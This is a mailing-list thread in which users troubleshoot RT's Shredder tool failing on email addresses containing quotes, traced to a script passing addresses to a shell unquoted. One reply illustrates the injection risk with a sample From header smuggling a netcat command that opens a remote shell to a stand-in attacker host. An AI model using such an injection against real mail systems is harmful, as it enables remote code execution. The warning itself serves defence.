Spam email question

Shredder doesn’t like when an email address contains either a single- or
double-qoute. Understandably so considering this messes with Perl and makes it
look for a closing, matching mark. This makes me wonder if it is possible to
strip these out of the email before it gets inserted as the username/email
address. Doing so would allow me to perform automated user shreds rather than
run my script manually everynight.

Mathew

Shredder doesn’t like when an email address contains either a
single- or
double-qoute. Understandably so considering this messes with Perl
and makes it
look for a closing, matching mark. This makes me wonder if it is
possible to

I don’t think it is “understandably so”. It is clearly a bug in
shredder… but without seeing the error, I can’t comment further on
what the problem might be.

strip these out of the email before it gets inserted as the
username/email
address. Doing so would allow me to perform automated user shreds
rather than
run my script manually everynight.

This assumes you get no legitimate email addresses with these
characters. These characters are legal in the local part of an email
address (at least the apostrophe is, not 100% sure on the double-quote.)

smime.p7s (2.47 KB)

Shredder doesn’t like when an email address contains either a single-
or double-qoute.

An email address, or the name associated with an email address? If it
really is broken enough to get upset when an email address includes
unbalanced quotes, it’s, well, broken; “(*&$%"”@example.com is a
perfectly good email address, as is '^#&!`|@example.com. (Some people
have even used such addresses, and find they don’t get picked up by
spammer scrapeware - a useful property for email addresses to have.)

Even if it’s the associated name, I’d call that somewhat broken. I
know someone who uses “Patrick O’Reilly” as the name portion of his
email address (not coincidentally, that’s his name).

Understandably so considering this messes with Perl and makes it look
for a closing, matching mark.

I find that extremely disturbing, because it implies that RT is
encountering these things in contexts where its string parsing code is
kicking in. This makes me wonder if perhaps a mail bearing a header
likeFrom: "; system(‘cat /dev/null | nc evil.cracker.example.org 12345 | sh’); $dummy = " me@innocent.example.org

would do something nasty. (It would even be legal from an email point
of view.)

/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse@rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B

It is definitely the email portion and not the RT username portion.
When I get to work tonight I will create a user with an email address
such as the one I describe so I can reproduce the error. I’ll post it here.

Mathew

der Mouse wrote:

I created a user called, for no reason in particular, splat’s@thisplace.com.
The error received is:

sh: -c: line 0: unexpected EOF while looking for matching `’'
sh: -c: line 1: syntax error: unexpected end of file

Th first line is the one I get most often. The second is because it happened to
be the last email address to be shredded. Usually Shredder will spit out the
first line and then move on to the next address at which point, everything will
chug along nicely.

Mathew

der Mouse wrote:

I created a user called, for no reason in particular,
splat’s@thisplace.com. The error received is:

sh: -c: line 0: unexpected EOF while looking for matching `‘’

Eek! It’s a shell reading that?

Perhaps try for date@example.com and see what happens! This could
have pretty hair-raising security implications…

/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse@rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B

That might be what the problem is actually. I still haven’t figured out how to
use the methods of Shredder in order to run it entirely within the script so
right now Shredder runs as a ‘system’ call.

Mathew

der Mouse wrote:

That might be what the problem is actually. I still haven’t figured
out how to use the methods of Shredder in order to run it entirely
within the script so right now Shredder runs as a ‘system’ call.

Sounds to me like your shell isn’t sufficiently quoting the address
when handing it off; can you post the script?

Cheers,
– jra
Jay R. Ashworth jra@baylink.com
Designer Baylink RFC 2100
Ashworth & Associates The Things I Think '87 e24
St Petersburg FL USA http://baylink.pitas.com +1 727 647 1274

I just went on vacation so as soon as I am able to log into work I’ll
get that for you. It was pointed out that the problem probably is the
shell not handling the single or double quotes. A previous suggestion
was to use an array of parameters and arguments but I’m not certain how
to do this with the rtx-shredder CLI options.

Mathew

Jay R. Ashworth wrote:> On Thu, Feb 08, 2007 at 11:30:24PM -0500, Mathew Snyder wrote:

That might be what the problem is actually. I still haven’t figured
out how to use the methods of Shredder in order to run it entirely
within the script so right now Shredder runs as a ‘system’ call.

Sounds to me like your shell isn’t sufficiently quoting the address
when handing it off; can you post the script?

Cheers,
– jra